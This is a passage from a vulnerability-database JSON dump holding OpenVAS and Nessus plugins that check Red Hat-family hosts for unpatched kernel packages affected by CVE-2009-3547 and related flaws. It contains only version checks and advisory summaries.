2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"CESA\", value:\"2009:1548\");\n script_cve_id(\"CVE-2009-2695\", \"CVE-2009-2908\", \"CVE-2009-3228\", \"CVE-2009-3286\", \"CVE-2009-3547\", \"CVE-2009-3613\");\n script_name(\"CentOS Update for kernel CESA-2009:1548 centos5 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"kernel on CentOS 5\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n Security fixes:\n\n * a system with SELinux enforced was more permissive in allowing local\n users in the unconfined_t domain to map low memory areas even if the\n mmap_min_addr restriction was enabled. This could aid in the local\n exploitation of NULL pointer dereference bugs. (CVE-2009-2695, Important)\n\n * a NULL pointer dereference flaw was found in the eCryptfs implementation\n in the Linux kernel. A local attacker could use this flaw to cause a local\n denial of service or escalate their privileges. (CVE-2009-2908, Important)\n\n * a flaw was found in the NFSv4 implementation. The kernel would do an\n unnecessary permission check after creating a file. This check would\n usually fail and leave the file with the permission bits set to random\n values. Note: This is a server-side only issue. (CVE-2009-3286, Important)\n\n * a NULL pointer dereference flaw was found in each of the following\n functions in the Linux kernel: pipe_read_open(), pipe_write_open(), and\n pipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could\n be released by other processes before it is used to update the pipe's\n reader and writer counters. This could lead to a local denial of service or\n privilege escalation. (CVE-2009-3547, Important)\n\n * a flaw was found in the Realtek r8169 Ethernet driver in the Linux\n kernel. pci_unmap_single() presented a memory leak that could lead to IOMMU\n space exhaustion and a system crash. An attacker on the local network could\n abuse this flaw by using jumbo frames for large amounts of network traffic.\n (CVE-2009-3613, Important)\n\n * missing initialization flaws were found in the Linux kernel. Padding data\n in several core network structures was not initialized properly before\n being sent to user-space. These flaws could lead to information leaks.\n (CVE-2009-3228, Moderate)\n\n Bug fixes:\n\n * with network bonding in the 'balance-tlb' or 'balance-alb' mode, the\n primary setting for the primary slave device was lost when said device was\n brought down. Bringing the slave back up did not restore the primary\n setting. (BZ#517971)\n\n * some faulty serial device hardware caused systems running the kernel-xen\n kernel to take a very long time to boot. (BZ#524153)\n\n * a caching bug in nfs_readdir() may have caused NFS clients to see\n duplicate files or not see all files in a directory. (BZ#526960)\n\n * the RHSA-2009:1243 update removed the mpt_msi_enable option, preventing\n certain scripts from running. This update adds the o ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~164.6.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~164.6.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~164.6.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~164.6.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~164.6.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~164.6.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~164.6.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~164.6.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~164.6.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~164.6.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2017-07-25T10:55:46", "bulletinFamily": "scanner", "description": "Check for the Version of kernel", "modified": "2017-07-10T00:00:00", "published": "2011-08-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=880731", "id": "OPENVAS:880731", "title": "CentOS Update for kernel CESA-2009:1548 centos5 i386", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2009:1548 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n Security fixes:\n \n * a system with SELinux enforced was more permissive in allowing local\n users in the unconfined_t domain to map low memory areas even if the\n mmap_min_addr restriction was enabled. This could aid in the local\n exploitation of NULL pointer dereference bugs. (CVE-2009-2695, Important)\n \n * a NULL pointer dereference flaw was found in the eCryptfs implementation\n in the Linux kernel. A local attacker could use this flaw to cause a local\n denial of service or escalate their privileges. (CVE-2009-2908, Important)\n \n * a flaw was found in the NFSv4 implementation. The kernel would do an\n unnecessary permission check after creating a file. This check would\n usually fail and leave the file with the permission bits set to random\n values. Note: This is a server-side only issue. (CVE-2009-3286, Important)\n \n * a NULL pointer dereference flaw was found in each of the following\n functions in the Linux kernel: pipe_read_open(), pipe_write_open(), and\n pipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could\n be released by other processes before it is used to update the pipe's\n reader and writer counters. This could lead to a local denial of service or\n privilege escalation. (CVE-2009-3547, Important)\n \n * a flaw was found in the Realtek r8169 Ethernet driver in the Linux\n kernel. pci_unmap_single() presented a memory leak that could lead to IOMMU\n space exhaustion and a system crash. An attacker on the local network could\n abuse this flaw by using jumbo frames for large amounts of network traffic.\n (CVE-2009-3613, Important)\n \n * missing initialization flaws were found in the Linux kernel. Padding data\n in several core network structures was not initialized properly before\n being sent to user-space. These flaws could lead to information leaks.\n (CVE-2009-3228, Moderate)\n \n Bug fixes:\n \n * with network bonding in the &quot;balance-tlb&quot; or &quot;balance-alb&quot; mode, the\n primary setting for the primary slave device was lost when said device was\n brought down. Bringing the slave back up did not restore the primary\n setting. (BZ#517971)\n \n * some faulty serial device hardware caused systems running the kernel-xen\n kernel to take a very long time to boot. (BZ#524153)\n \n * a caching bug in nfs_readdir() may have caused NFS clients to see\n duplicate files or not see all files in a directory. (BZ#526960)\n \n * the RHSA-2009:1243 update removed the mpt_msi_enable option, preventing\n certain scripts from running. This update adds the o ... \n\n Description truncated, for more information please check the Reference URL\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"kernel on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2009-November/016304.html\");\n script_id(880731);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2009:1548\");\n script_cve_id(\"CVE-2009-2695\", \"CVE-2009-2908\", \"CVE-2009-3228\", \"CVE-2009-3286\", \"CVE-2009-3547\", \"CVE-2009-3613\");\n script_name(\"CentOS Update for kernel CESA-2009:1548 centos5 i386\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~164.6.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~164.6.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~164.6.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~164.6.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~164.6.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~164.6.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~164.6.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~164.6.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~164.6.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~164.6.1.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:18:16", "bulletinFamily": "scanner", "description": "Updated kernel packages that fix security issues are now available for Red Hat Enterprise Linux 4.7 Extended Update Support.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nThis update fixes the following security issues :\n\n* a NULL pointer dereference flaw was found in each of the following functions in the Linux kernel: pipe_read_open(), pipe_write_open(), and pipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could be released by other processes before it is used to update the pipe's reader and writer counters. This could lead to a local denial of service or privilege escalation. (CVE-2009-3547, Important)\n\nUsers should upgrade to these updated packages, which contain a backported patch to correct these issues. The system must be rebooted for this update to take effect.", "modified": "2016-05-19T00:00:00", "id": "REDHAT-RHSA-2009-1588.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=63902", "published": "2013-01-24T00:00:00", "title": "RHEL 4 : kernel (RHSA-2009:1588)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1588. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63902);\n script_version(\"$Revision: 1.10 $\");\n script_cvs_date(\"$Date: 2016/05/19 17:53:35 $\");\n\n script_cve_id(\"CVE-2009-3547\");\n script_bugtraq_id(36901);\n script_xref(name:\"RHSA\", value:\"2009:1588\");\n\n script_name(english:\"RHEL 4 : kernel (RHSA-2009:1588)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix security issues are now available for\nRed Hat Enterprise Linux 4.7 Extended Update Support.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* a NULL pointer dereference flaw was found in each of the following\nfunctions in the Linux kernel: pipe_read_open(), pipe_write_open(),\nand pipe_rdwr_open(). When the mutex lock is not held, the i_pipe\npointer could be released by other processes before it is used to\nupdate the pipe's reader and writer counters. This could lead to a\nlocal denial of service or privilege escalation. (CVE-2009-3547,\nImportant)\n\nUsers should upgrade to these updated packages, which contain a\nbackported patch to correct these issues. The system must be rebooted\nfor this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3547.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://kbase.redhat.com/faq/docs/DOC-20481\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2009-1588.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-hugemem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-hugemem-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-largesmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-largesmp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-smp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xenU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xenU-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL4\", sp:\"7\", reference:\"kernel-2.6.9-78.0.28.EL\")) flag++;\nif (rpm_check(release:\"RHEL4\", sp:\"7\", reference:\"kernel-devel-2.6.9-78.0.28.EL\")) flag++;\nif (rpm_check(release:\"RHEL4\", sp:\"7\", reference:\"kernel-doc-2.6.9-78.0.28.EL\")) flag++;\nif (rpm_check(release:\"RHEL4\", sp:\"7\", cpu:\"i686\", reference:\"kernel-hugemem-2.6.9-78.0.28.EL\")) flag++;\nif (rpm_check(release:\"RHEL4\", sp:\"7\", cpu:\"i686\", reference:\"kernel-hugemem-devel-2.6.9-78.0.28.EL\")) flag++;\nif (rpm_check(release:\"RHEL4\", sp:\"7\", cpu:\"x86_64\", reference:\"kernel-largesmp-2.6.9-78.0.28.EL\")) flag++;\nif (rpm_check(release:\"RHEL4\", sp:\"7\", cpu:\"x86_64\", reference:\"kernel-largesmp-devel-2.6.9-78.0.28.EL\")) flag++;\nif (rpm_check(release:\"RHEL4\", sp:\"7\", cpu:\"i686\", reference:\"kernel-smp-2.6.9-78.0.28.EL\")) flag++;\nif (rpm_check(release:\"RHEL4\", sp:\"7\", cpu:\"x86_64\", reference:\"kernel-smp-2.6.9-78.0.28.EL\")) flag++;\nif (rpm_check(release:\"RHEL4\", sp:\"7\", cpu:\"i686\", reference:\"kernel-smp-devel-2.6.9-78.0.28.EL\")) flag++;\nif (rpm_check(release:\"RHEL4\", sp:\"7\", cpu:\"x86_64\", reference:\"kernel-smp-devel-2.6.9-78.0.28.EL\")) flag++;\nif (rpm_check(release:\"RHEL4\", sp:\"7\", cpu:\"i686\", reference:\"kernel-xenU-2.6.9-78.0.28.EL\")) flag++;\nif (rpm_check(release:\"RHEL4\", sp:\"7\", cpu:\"x86_64\", reference:\"kernel-xenU-2.6.9-78.0.28.EL\")) flag++;\nif (rpm_check(release:\"RHEL4\", sp:\"7\", cpu:\"i686\", reference:\"kernel-xenU-devel-2.6.9-78.0.28.EL\")) flag++;\nif (rpm_check(release:\"RHEL4\", sp:\"7\", cpu:\"x86_64\", reference:\"kernel-xenU-devel-2.6.9-78.0.28.EL\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:17:13", "bulletinFamily": "scanner", "description": "CVE-2009-3547 kernel: fs: pipe.c NULL pointer dereference\n\nThis update fixes the following security issues :\n\n - a NULL pointer dereference flaw was found in each of the following functions in the Linux kernel:\n pipe_read_open(), pipe_write_open(), and pipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could be released by other processes before it is used to update the pipe's reader and writer counters. This could lead to a local denial of service or privilege escalation. (CVE-2009-3547, Important)\n\nThe system must be rebooted for this update to take effect.", "modified": "2019-01-02T00:00:00", "id": "SL_20091103_KERNEL_ON_SL4_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=60689", "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : kernel on SL4.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60689);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/01/02 10:36:43\");\n\n script_cve_id(\"CVE-2009-3547\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL4.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2009-3547 kernel: fs: pipe.c NULL pointer dereference\n\nThis update fixes the following security issues :\n\n - a NULL pointer dereference flaw was found in each of the\n following functions in the Linux kernel:\n pipe_read_open(), pipe_write_open(), and\n pipe_rdwr_open(). When the mutex lock is not held, the\n i_pipe pointer could be released by other processes\n before it is used to update the pipe's reader and writer\n counters. This could lead to a local denial of service\n or privilege escalation. (CVE-2009-3547, Important)\n\nThe system must be rebooted for this update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0911&L=scientific-linux-errata&T=0&P=476\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c7739e1b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL4\", reference:\"kernel-2.6.9-89.0.16.EL\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"kernel-devel-2.6.9-89.0.16.EL\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"kernel-doc-2.6.9-89.0.16.EL\")) flag++;\nif (rpm_check(release:\"SL4\", cpu:\"i386\", reference:\"kernel-hugemem-2.6.9-89.0.16.EL\")) flag++;\nif (rpm_check(release:\"SL4\", cpu:\"i386\", reference:\"kernel-hugemem-devel-2.6.9-89.0.16.EL\")) flag++;\nif (rpm_check(release:\"SL4\", cpu:\"x86_64\", reference:\"kernel-largesmp-2.6.9-89.0.16.EL\")) flag++;\nif (rpm_check(release:\"SL4\", cpu:\"x86_64\", reference:\"kernel-largesmp-devel-2.6.9-89.0.16.EL\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"kernel-smp-2.6.9-89.0.16.EL\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"kernel-smp-devel-2.6.9-89.0.16.EL\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"kernel-xenU-2.6.9-89.0.16.EL\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"kernel-xenU-devel-2.6.9-89.0.16.EL\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:18:16", "bulletinFamily": "scanner", "description": "Updated kernel packages that fix multiple security issues and one bug are now available for Red Hat Enterprise Linux 5.2 Extended Update Support.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nThis update fixes the following security issues :\n\n* a system with SELinux enforced was more permissive in allowing local users in the unconfined_t domain to map low memory areas even if the mmap_min_addr restriction was enabled. This could aid in the local exploitation of NULL pointer dereference bugs. (CVE-2009-2695, Important)\n\n* a NULL pointer dereference flaw was found in each of the following functions in the Linux kernel: pipe_read_open(), pipe_write_open(), and pipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could be released by other processes before it is used to update the pipe's reader and writer counters. This could lead to a local denial of service or privilege escalation. (CVE-2009-3547, Important)\n\nThis update also fixes the following bug :\n\n* a bug in the IPv6 implementation in the Linux kernel could have caused an unbalanced reference count. When using network bonding, this bug may have caused a hang when shutting the system down via 'shutdown\n-h', or prevented the network service from being stopped via 'service network stop'. (BZ#538409)\n\nUsers should upgrade to these updated packages, which contain backported patches to correct these issues. The system must be rebooted for this update to take effect.", "modified": "2017-01-10T00:00:00", "id": "REDHAT-RHSA-2009-1672.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=63910", "published": "2013-01-24T00:00:00", "title": "RHEL 5 : kernel (RHSA-2009:1672)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1672. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63910);\n script_version(\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2017/01/10 18:05:23 $\");\n\n script_cve_id(\"CVE-2009-2695\", \"CVE-2009-3547\");\n script_bugtraq_id(36901);\n script_xref(name:\"RHSA\", value:\"2009:1672\");\n\n script_name(english:\"RHEL 5 : kernel (RHSA-2009:1672)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix multiple security issues and one bug\nare now available for Red Hat Enterprise Linux 5.2 Extended Update\nSupport.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response 